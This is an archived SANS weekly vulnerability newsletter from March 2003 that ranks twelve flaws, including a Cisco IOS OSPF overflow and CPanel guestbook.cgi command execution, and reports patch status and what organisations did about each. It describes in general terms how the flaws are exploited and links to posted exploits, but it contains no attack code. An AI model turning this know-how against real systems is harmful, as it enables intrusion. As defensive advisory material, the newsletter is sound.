|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: The SANS Institute (CriticalVulnerabilityAnalysis
sans.org)
Date: Mon Mar 03 2003 - 08:19:22 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Later today, we will send out an alert with two additional critical
vulnerabilities that will require immediate action.
***********************************************************************
SANS Critical Vulnerability Analysis
March 3, 2003 Vol. 2. No. 8
***********************************************************************
The weekly CVA prioritizes and summarizes the most important
vulnerabilities and attacks identified during the past week and
provides guidance on appropriate actions to protect your systems.
***********************************************************************
Table of Contents:
Widely Deployed Software:
(1) CRITICAL: Cisco IOS OSPF Neighbor Buffer Overflow
(2) HIGH: Windows ME/XP IE Help Center Code Execution
(3) HIGH: Multi-Vendor Session Initiation Protocol (SIP)
Vulnerabilities
(4) LOW: OpenSSL CBC MIM Error Message Timing Attack
(5) LOW: Multi-Vendor Terminal Escape Sequence Vulnerabilities
Other Software:
(6) HIGH: ISMAIL Domain Name Buffer Overflow
(7) HIGH: Mambo Site Server Session ID Spoofing
(8) HIGH: Webmin/Usermin Web Server Session ID Spoofing
(9) HIGH: Apple Quicktime/Darwin Administration Server Buffer Overflow
(10) HIGH: CPanel guestbook.cgi Remote Command Execution Vulnerability
(11) MODERATE: moxftp Client Server Banner Buffer Overflow
(12) MODERATE: sircd IRC Server DNS Lookup Hostname Buffer Overflow
************************* Sponsored Links ***************************
Privacy notice: These links redirect to non-SANS web pages.
Snort creators take IDS to the next level - flexibility, scalability,
complete data management. **FREE WHITEPAPER**
http://www.sans.org/cgi-bin/sanspromo/CVA22
- ----------------------------------------------------------------------
Protect your network and get the latest virus news with Computer
Associates' Virus Information Center!
http://www.sans.org/cgi-bin/sanspromo/CVA23
- ---------------------------------------------------------------------
Network Audit and Policy Assurance - Because real-time is not fast
enough! See a demo - http://www.sans.org/cgi-bin/sanspromo/CVA24
***********************************************************************
********************************************************************
Widely Deployed Software
********************************************************************
(1) CRITICAL: Cisco IOS OSPF Neighbor Buffer Overflow
================================================================
Affected Products:
Cisco IOS Versions 11.1 - 12.0
Description:
Older versions of IOS contain a vulnerability in handling more than
255 distinct OSPF neighbor announcements per interface. Exploit
code has been posted that leverages the vulnerability to execute
attacker-supplied code on a vulnerable router resulting in complete
system compromise. The exploit code was developed by FX of Phenoelit,
who recently published a paper on writing buffer overflows for IOS.
Risk: Cisco router compromise.
Deployment: Significant. The fix for this vulnerability has been
available for some time, but due to many administrators' reluctance
to update router software, the deployed base could still be sizable.
Ease of Exploitation: Simple. Exploit code has been posted.
Status: Vendor confirmed, all IOS versions including and following
the versions listed below contain the fix:
12.0(19)S, 12.0(19)ST, 12.1(1), 12.1(1)DB, 12.1(1)DC, 12.1(1)T.
Severity: CRITICAL (server root compromise, infrastructure,
exploit code avaiable, significant deployment)
References:
- ------------
Bugtraq posting by FX of Phenoelit (includes exploit):
http://www.securityfocus.com/archive/1/312510/2003-02-19/2003-02-25/0
Cisco Statement:
http://archives.neohapsis.com/archives/bugtraq/2003-02/0267.html
SecurityFocus Vulnerability Information (includes exploit)
http://www.securityfocus.com/bid/6895
FX's Paper on Writing Buffer Overflows for IOS (Phrack #60 2002-12-28)
http://www.phrack-dont-give-a-shit-about-dmca.org/show.php?p=60&a=7
Council Site Actions:
Nearly all sites saw this as important for immediate action. Most
sites have already installed the patch and/or block OSPF at the border.
***********************************************************************
(2) HIGH: Windows ME/XP IE Help Center Code Execution
=================================================================
Affected Products:
Windows ME (any version)
Windows XP without SP1
Description:
It is possible for attackers to construct a malicious URL that will,
when opened by Internet Explorer, execute arbitrary code on the system
of the user running the browser. The problem is with the Windows
Help and Support Center, which is responsible for handling hcp://
URLs. Users can be compromised by clicking on a malicious link in
a webpage or email or, under some circumstances, by simply opening
a hostile email. Attacker- supplied code will be executed with the
privileges of the currently logged-in user.
Risk: Windows ME/XP web/email client compromise.
Deployment: Widely deployed. The vulnerability affects all
Windows ME users and some Windows XP users.
Ease of Exploitation: Simple. The Hackademy posting shows how to
exploit the flaw to execute arbitrary script in the Local Computer
Zone of a vulnerable system.
Status: Vendor confirmed, patch available.
Severity: HIGH (client compromise, exploit details, widely deployed)
References:
- -----------
VulnWatch posting by Fozzy of Hackademy:
http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0098.html
Microsoft Security Bulletin MS03-006:
http://www.microsoft.com/technet/security/bulletin/MS03-006.asp
Council Site Actions:
Council site responses varied widely. Some do not tell their end users
about vulnerabilities until they are being actively exploited. Others
notified their help desks. Others scheduled patches for the next
update cycle and others have already patched it.
***********************************************************************
(3) HIGH: Multi-Vendor Session Initiation Protocol (SIP) Vulnerabilities
========================================================================
Affected Products:
Cisco PIX Firewall with SIP support running some 5.x and 6.x versions
Cisco Routers running IOS 12.2T and 12.2X trains
Cisco IP Phone Model 7490/7960 running SIP images prior to 4.2
IPTel SIP Express Router
Nortel Succession Communication Server 2000 where SIP-T is provisioned
Other vendor products (see CERT advisory)
Description:
Multiple vulnerabilities have been found in various vendor
implementations of the SIP protocol, a new protocol gaining usage in
VoIP applications. The vulnerabilities were revealed by the latest
PROTOS test suite that stresses an implementation's ability to handle
malformed SIP INVITE messages. The vulnerabilities range from buffer
overflows allowing remote code execution to denial of service attacks
which include rebooting Cisco routers and PIX firewalls remotely.
Risk: Remote compromise and/or denial of service.
Deployment: Widely deployed. This vulnerability affects products
from multiple vendors, including widely deployed Cisco routers and
firewalls.
Ease of Exploitation: Denial of service attacks: Simple. The
vulnerabilities can be exploited by the testcases provided in the
PROTOS SIP test suite.
Status: Varies according to vendor. The CERT advisory contains
vendor-specific information. Cisco has released a separate advisory
with patch information.
Severity: HIGH (DoS and potentially code execution, infrastructure,
widely deployed, DoS exploit code available)
References:
- ------------
CERT Advisory:
http://www.cert.org/advisories/CA-2003-06.html
Cisco Advisory:
http://www.cisco.com/warp/public/707/cisco-sa-20030221-protos.shtml
OUSPG PROTOS SIP Project Page:
http://www.ee.oulu.fi/research/ouspg/protos/testing/c07/sip/
Council Site Actions:
No sites reported that they are affected by this vulnerability,
but several said they use IP telephone and that this vulnerability
raises the issue of IP telephony security.
***********************************************************************
(4) LOW: OpenSSL CBC MIM Error Message Timing Attack
=============================================================
Affected Products:
OpenSSL versions prior to 0.9.6i and 0.9.7a
when used with block ciphers in CBC mode
Description:
In certain configurations OpenSSL is vulnerable to a timing-based
man-in-the-middle attack that allows a remote attacker to recover
sensitive information (such as a password) that is sent repeatedly
across SSL connections. Attackers must be able to intercept and
modify data sent between client and server for hundreds or thousands
of sessions containing the target information. An practical attack
has been demostrated for recovering the password of a secure IMAP
user in an common client configuration where the user password is
sent to the server multiple times every few minutes.
Risk: Compromise of sensitive information, such as a password, that
is sent repeatedly over an SSL connection.
Deployment: Moderate. The affected OpenSSL versions are widely
deployed, but are not often used with block ciphers in CBC mode.
Ease of Exploitation: Challenging. The attacker must write code
and must be positioned on the network such that normal variations
in network latency do not ruin the timing measurements. Further,
the attacker must be able to intercept and modify client-server
communications, and must have access to hundreds of sessions containing
the information to be recovered.
Status: OpenSSL versions 0.9.6i and 0.9.7a contain the fix.
Severity: LOW (client account compromise, difficult exploit,
vulnerabilitiy details available)
References:
- --------------
OpenSSL Advisory:
http://www.openssl.org/news/secadv_20030219.txt
Description of using the attack to obtain a password:
http://lasecwww.epfl.ch/memo_ssl.shtml
News Article:
http://news.bbc.co.uk/2/hi/technology/2785145.stm
SecurityFocus Vulnerability Information:
http://www.securityfocus.com/bid/6884
Council Site Actions:
No council sites reported using the affected software.
***********************************************************************
(5) LOW: Multi-Vendor Terminal Escape Sequence Vulnerabilities
================================================================
Affected Products:
gnome-terminal, eterm, xterm, dtterm, uxterm, rxvt, aterm, hanterm
and putty terminal emulators
Description:
Terminal emulator programs from multiple vendors are vulnerable to
the injection of hostile escape sequences into an active terminal
session. An attacker could accomplish the task, for example,
by compromising a server and attacking the client directly or by
placing malicious content in a logfile that the victim will view via
a terminal session. The flaws allow attackers to write arbitrary files
and execute arbitrary commands on vulnerable terminal client systems.
Risk: Terminal client compromise.
Deployment: Significant. These vulnerabilities affect products from
multiple vendors.
Ease of Exploitation: Straightforward. The escape sequences an attacker
can use are provided in the Bugtraq posting. The attacker's biggest
challenge lies in figuring out how to get the sequences injected into
an active terminal session involving a potential victim.
Status: Varies according to vendor. Several vendors have not yet
responded.
Severity: LOW (client compromise, vulnerability details available,
may require social engineering, significant deployment)
References:
- ------------
Bugtraq Posting by H D Moore:
http://archives.neohapsis.com/archives/bugtraq/2003-02/0313.html
Red Hat Advisory:
http://archives.neohapsis.com/archives/bugtraq/2003-02/0319.html
Further Commentary and eTerm Vendor Response:
http://archives.neohapsis.com/archives/bugtraq/2003-02/0323.html
http://archives.neohapsis.com/archives/bugtraq/2003-02/0324.html
http://archives.neohapsis.com/archives/bugtraq/2003-02/0348.html
http://archives.neohapsis.com/archives/bugtraq/2003-02/0326.html
Council Site Actions:
The sites that are affected by this problem said that patches would
be applied in the next regularly scheduled update.
***********************************************************************
********************************************************************
Other Software
********************************************************************
(6) HIGH: ISMAIL Domain Name Buffer Overflow
==================================================================
Affected Products:
ISMail v. 1.25 and 1.4.3 running on Windows NT/2000/XP
Description:
ISMail is a mail server for Windows designed for home and office
use. ISMail contains a buffer overflow in the SMTP service. A remote
attacker can supply an over-long domain name as part of MAIL FROM:
or RCPT TO: value, and cause a buffer overflow. The vulnerability
can be exploited to cause a denial of service or to execute arbitrary
code with "Local System" privileges.
Risk: ISMail mail server DoS or compromise.
Deployment: Moderate. ISMail is a multi-featured commercial mail
server application available for $99 from InstantServers.com.
Ease of Exploitation: Unknown, but assumed to be straightforward.
This is a stack-based overflow.
Status: Vendor confirmed, fixed software available.
Severity: HIGH (server SYSTEM-level compromise, vulnerability details
available)
References:
- ------------
NGSSoftware Security Advisory
http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0097.html
Vendor Website and Download.com Free Trial Download:
http://instantservers.com/ismail.html
http://download.com.com/3000-2165-10163100.html?tag=lst-0-8
Council Site Actions:
No council sites reported using the affected software. One r
***********************************************************************
(7) HIGH: Mambo Site Server Session ID Spoofing
===========================================================
Affected Products:
Mambo Open Souce Site Server versions prior to 4.0.12 RC3
Description:
Mambo Site Server is a popular open souce web content management
system. All versions prior to the latest release contain a session
ID spoofing vulnerability that allows remote attackers to gain
administrative control of the server without a username/password.
An exploit has been posted that causes the server to generate a valid
session ID and then uses the ID to authenticate as administrator via
the HTTP interface.
Risk: Mambo Site Server server compromise.
Deployment: Moderate. Mambo is a popular, well-maintained open source
program that integrates with Apache and runs on Linux, MacOS/X and
Windows NT/2000.
Ease of Exploitation: Simple. Exploit code has been posted.
Status: Vendor confirmed, version 4.0.12 RC3 contains the fix.
Severity: HIGH (server compromise, exploit code available)
References:
- ------------
Bugtraq posting by Simen Bergo (includes exploit):
http://archives.neohapsis.com/archives/bugtraq/2003-02/0302.html
SecurityFocus Vulnerability Information (includes exploit)
http://www.securityfocus.com/bid/6926
Vendor Website:
http://www.mamboserver.com/
Council Site Actions:
No council sites reported using the affected software. One r
***********************************************************************
(8) HIGH: Webmin/Usermin Web Server Session ID Spoofing Vulnerability
===============================================================
Affected Products:
The web server (minserv.pl) used by Webmin prior to version 1.070
and Usermin prior to version 1.000
Description:
Webmin and Usermin are web-based system administration interface
applications for Unix. The Webmin/Usermin HTTP server contains a
session ID spoofing vulnerability that allows remote attackers to gain
administrative control of the server without a username/password.
An exploit has been posted that injects a fake session ID into
a server's ID tracking table and then uses the fake ID to gain
administrator-level access via the HTTP interface.
Risk: Webmin/Usermin web server compromise.
Deployment: Moderate. Webmin/Usermin is a Caldera project that
is available under the BSD license. The software ships with some
operating systems including EnGarde, Gentoo and Mandrake Linux.
Ease of Exploitation: Simple. Exploit code has been posted. The posted
code works on webmin servers where the non-default "passdelay" option
has been enabled.
Status: Vendor confirmed and fixed in Webmin version 1.070 and Usermin
version 1.000.
Severity: HIGH (server compromise, exploit code available)
References:
- -------------
EnGarde Security Advisory:
http://archives.neohapsis.com/archives/linux/engarde/2003-q1/0008.html
Bugtraq Posting by Carl Livitt (includes exploit):
http://archives.neohapsis.com/archives/bugtraq/2003-02/0284.html
Vendor Website and Fix Announcement:
http://www.webmin.com/
http://marc.theaimsgroup.com/?l=webmin-announce&m=104587858408101&w=2
SecurityFocus Vulnerability Information (includes exploit):
http://www.securityfocus.com/bid/6915
Council Site Actions:
Most council sites reported that they do not use the affected software.
The one that did believes that standard installation (which the
users did not modify) does not enable the passdelay option. They are
verifying that belief and will take immediate action for priority
patching if they discover their expectation is wrong.
***********************************************************************
(9) HIGH: Apple Quicktime/Darwin Administration Server Buffer Overflow
============================================================================
Affected Products:
Apple QuickTime Administration Server version 4.1.1
Apple Darwin Administration Server version 4.1.2
Description:
The Apple Quicktime and Darwin Administration Servers are web-based
remote management applications for the QuickTime and Darwin Streaming
Media Servers. By default, these HTTP-based adminstration servers
run as root on port 1220/tcp. The servers contain a perl open()
vulnerability that allows remote attackers to execute arbitrary
commands with the privileges of the server process. A malicious GET
request can exploit the flaw. Several other vulnerabilities also
exist and are described in the advisory.
Risk: QuickTime/Darwin Administration Server server compromise.
Deployment: Small-Moderate. QuickTime Streaming Server is designed
for MacOS/X, and is also available as an open source server called
Darwin Streaming Server for Linux, Solaris and Windows NT/2000. Both
servers are free from Apple.
Ease of Exploitation: Straightforward. The advisory contains enough
information that an attacker can discover the rest of the technical
details and craft an attack.
Status: These vulnerabilities have been confirmed by the vendor,
who has released update instructions available at:
http://www.info.apple.com/kbnum/n70171
http://www.info.apple.com/kbnum/n70172
Severity: HIGH (server root compromise, vulnerability details)
References:
- ------------
stake Advisory:
http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0094.html
SecurityFocus Vulnerability Information:
http://www.securityfocus.com/bid/6954
Vendor Website:
http://www.apple.com/quicktime/products/qtss/
Council Site Actions:
No council sites reported using the affected software. One r
***********************************************************************
(10) HIGH: CPanel guestbook.cgi Remote Command Execution
==============================================================
Affected Products:
CPanel CGI Suite version 5.0 and possibly earlier versions
Description:
The CPanel CGI suite allows web hosting customers to manage their
account information via a web interface. The included guestbook.cgi
program contains a perl open() vulnerability that allows remote
attackers to execute arbitrary code with the privileges of
the web server process. A malicious GET request can exploit the
bug. Easy-to-use exploits have been posted that allow attackers to
specify an arbitrary command line to be executed on a vulnerable
remote system.
Risk: Compromise of web servers that allow remote access to CPanel's
guestbook.cgi program.
Deployment: Moderate. CPanel is a popular commercial web hosting
control panel package for Unix that allows clients to manage their
accounts through a web interface. A one-time license is priced
at $1400.
Ease of Exploitation: Simple. Multiple exploits have been posted.
Status: These vulnerabilities have not been confirmed.
Severity: HIGH (server compromise, exploit code available)
References:
- -------------
VulnWatch Posting by pokleyzz:
http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0087.html
Exploit Codes by cyzek, CaMaLeoN, and bobdtors.net:
http://archives.neohapsis.com/archives/bugtraq/2003-02/0279.html
http://downloads.securityfocus.com/vulnerabilities/exploits/cpanel-VH.pl
http://www.packetstormsecurity.nl/filedesc/DSR-cpanel.c.html
SecurityFocus Vulnerability Information:
http://www.securityfocus.com/bid/6882
Vendor Website:
http://www.cpanel.net/realindex.html?from=
Council Site Actions:
No council sites reported using the affected software. One r
***********************************************************************
(11) MODERATE: moxftp Client Server Banner Buffer Overflow
==============================================================
Affected Products:
moxftp FTP client version 2.2
Description:
The moxftp FTP client contains a buffer overflow in the handling
of over-large server banners. A malicious FTP server can exploit
the vulnerability to execute arbitary code on the client system
with the privileges of the user running moxftp. An exploit has been
posted that provides a malicious server with shell access to a victim
client machine.
Risk: moxftp FTP client compromise.
Deployment: Small. moxftp is an FTP user interface for X-Windows
available for several versions of Unix.
Ease of Exploitation: Simple. Exploit code has been posted.
Status: This vulnerability has not been confirmed.
Severity: MODERATE (client compromise, exploit code available)
References:
- -----------
Bugtraq Posting by Knud Erik Hojgaard (exploit included):
http://archives.neohapsis.com/archives/bugtraq/2003-02/0285.html
Background Information on moxftp:
http://media.it.kth.se/SONAH/ANALYSYS/acts/sonah/guide/ar/ftptoo.html
SecurityFocus Vulnerability Information:
http://www.securityfocus.com/bid/6921
Council Site Actions:
No council sites reported using the affected software. One r
***********************************************************************
(12) MODERATE: sircd IRC Server DNS Lookup Hostname Buffer Overflow
======================================================================
Affected Products:
sircd IRC server versions 0.4.0 and 0.4.4
Description:
The sircd IRC server is vulnerable to a buffer overflow in the handling
of an over-long hostname supplied by a malicious DNS server responding
to a name lookup request. The vulnerability can be exploited to
execute arbitrary code with the privileges of the sircd process. An
exploit has been posted that takes advantage of the fact that sircd
performs automatic name lookups on connecting client IPs.
Risk: sircd IRC server compromise.
Deployment: Small. Sircd is alpha level open souce software that is
supported on FreeBSD, WindowsNT/2000, Linux and Solaris.
Ease of Exploitation: Straightforward. Exploit code has been posted
that grants shell access to a remote attacker. The attacker's biggest
challenge lies in manipulating DNS information so that the server
receives the malicious code in response to a DNS name lookup request.
Status: The advisory indicates vendor confirmation, who has committed
a patch into CVS on Feb. 4, 2003.
Severity: MODERATE (server compromise, exploit code available,
attacker must manipulate DNS)
References:
- ------------
Bugtraq Posting by Knud Erik Hojgaard (exploit included):
http://archives.neohapsis.com/archives/bugtraq/2003-02/0293.html
Vendor Website:
http://www.sircd.org
Council Site Actions:
No council sites reported using the affected software. One r
***********************************************************************
************************************************************
About the CVA Process and Council
The CVA is produced in four phases:
Phase 1: Neohapsis (www.neohapsis.com) director of research, Jeff
web sites as well as bugtraq and other sources of new vulnerability
information and compile what they believe to be a complete list of all
new vulnerabilities and major vulnerability announcements made during
the week. The SANS Institute and Network Computing Magazine vet the
list through the major system manufacturers and jointly publish it
every week as the Security Alert Consensus. (SAC) Anyone may subscribe
to the SAC at http://www.sans.org/newlook/digests/SAC.htm
Phase 2: TippingPoint's Vicki Irwin culls the SAC list to extract the
vulnerabilities and announcements that demand immediate action. This
reduces the list from 30-50 each week down under 10. Vicki has been
on the front lines of intrusion detection and vulnerability testing
for nearly six years and her work in the field is legendary.
Phase 3: Very technical security managers at fifteen of the largest
user organizations in the United States each review the "immediate
action" vulnerabilities and describe what they did or did not do
to protect their organizations. Council members include banks and
other financial organizations, government agencies, universities,
major research laboratories, ISPs, health care, manufacturers,
insurance companies and a couple more. The individual members have
direct responsibility for security for their systems and networks. All
were concerned that information about their security configuration
would leak out, and agreed to serve only if their identities were
not revealed.
Phase 4: SANS compiles the responses and identifies the items on which
the Council members took or are taking action, produces the weekly CVA,
and distributes it via email to all eligible persons.
**********************************************************************
Critical Vulnerability Analysis Scale Ratings
In ranking vulnerabilities several factors are taken into account,
such as:
- - Is this a server or client compromise? At what privilege level?
- - Is the affected product widely deployed?
- - Is the problem found in default configurations/installations?
- - Are the affected assets high value (e.g. databases, e-commerce
servers)?
- - Is the network infrastructure affected (DNS, routers, firewalls)?
- - Is exploit code publicly available?
- - Are technical vulnerability details available?
- - How difficult is it to exploit the vulnerability?
- - Does the attacker need to lure victims to a hostile server?
Based on the answers to these questions, vulnerabilities are ranked
as Critical, High, Moderate, or Low.
CRITICAL vulnerabilities are those where essentially all planets
align in favor of the attacker. These vulnerabilities typically
affect default installations of very widely deployed software, result
in root compromise of servers or infrastructure devices, and the
information required for exploitation (such as example exploit code)
is widely available to attackers. Further, exploitation is usually
straightforward, in the sense that the attacker does not need any
special knowledge about individual victims, and does not need to lure
a target user into performing any special functions.
HIGH vulnerabilities are usually issues that have the potential to
become CRITICAL, but have one or a few mitigating factors that make
exploitation less attractive to attackers. For example, vulnerabilities
that have many CRITICAL characteristics but are difficult to exploit,
do not result in elevated privileges, or have a minimally sized victim
pool are usually rated HIGH. Note that HIGH vulnerabilities where the
mitigating factor arises from a lack of technical exploit details will
become CRITICAL if these details are later made available. Thus, the
paranoid administrator will want to treat such HIGH vulnerabilities as
CRITICAL, if it is assumed that attackers always possess the necessary
exploit information.
MODERATE vulnerabilities are those where the scales are slightly tipped
in favor of the potential victim. Denial of service vulnerabilities
are typically rated MODERATE, since they do not result in compromise
of a target. Exploits that require an attacker to reside on the same
local network as a victim, only affect nonstandard configurations
or obscure applications, require the attacker to social engineer
individual victims, or where exploitation only provides very limited
access are likely to be rated MODERATE.
LOW vulnerabilities usually do not affect most administrators, and
exploitation is largely unattractive to attackers. Often these issues
require the attacker to already have some level of access to a target
(e.g. be able to execute arbitrary SQL queries, or be able to pop mail
from a mail server), require elaborate specialized attack scenarios,
and only result in limited damage to a target. Alternatively, a LOW
ranking may be applied when there is not enough information to fully
assess the implications of a vulnerability. For example, vendors often
imply that exploitation of a buffer overflow will only result in a
denial of service. However, many times such flaws are later shown
to allow for execution of attacker-supplied code. In these cases,
the issues are reported in order to alert security professionals to
the potential for deeper problems, but are ranked as LOW due to the
element of speculation.
Remediation Timescale
===================================
A vulnerability rating corresponds to the "threat level" of a
particular issue. Critical threats must be responded to most quickly,
as the potential for exploitation is high. Recommended response times
corresponding to each of the ratings is below. These recommendations
should be tailored according to the level of deployment of the affected
product at your organization.
CRITICAL: 48 hours
HIGH: 5 business days
MODERATE: 15 business days
LOW: At the administrator's discretion
******************************************************************
Subscriptions: The CVA is distributed free of charge to people
responsible for securing information systems and networks. You may
forward this newsletter to any people with such responsibility inside
or outside your organization.
To subscribe, at no cost, go to https://www.sans.org/sansnews/
where you may also request subscriptions to any of SANS other free
newsletters.
To change your subscription, address, or other information, visit
http://www.sans.org/sansurl and enter your SD number or email address
(from the headers.) You will receive your personal URL via email.
Copyright 2003. All rights reserved. No copying, forwarding, or reuse
allowed, other than those listed in the preceding paragraph, without
written permission from the SANS Institute. Email sansrosans.org
for permission.
==end==
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)
iD8DBQE+Y1lc+LUG5KFpTkYRAsPQAJsH0FeTc6/yRyLt2b/pg9fu2Pym+ACdE8/q
7gtJpk1LfX8gMjrbOvQRwcw=
=4njE
-----END PGP SIGNATURE-----
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]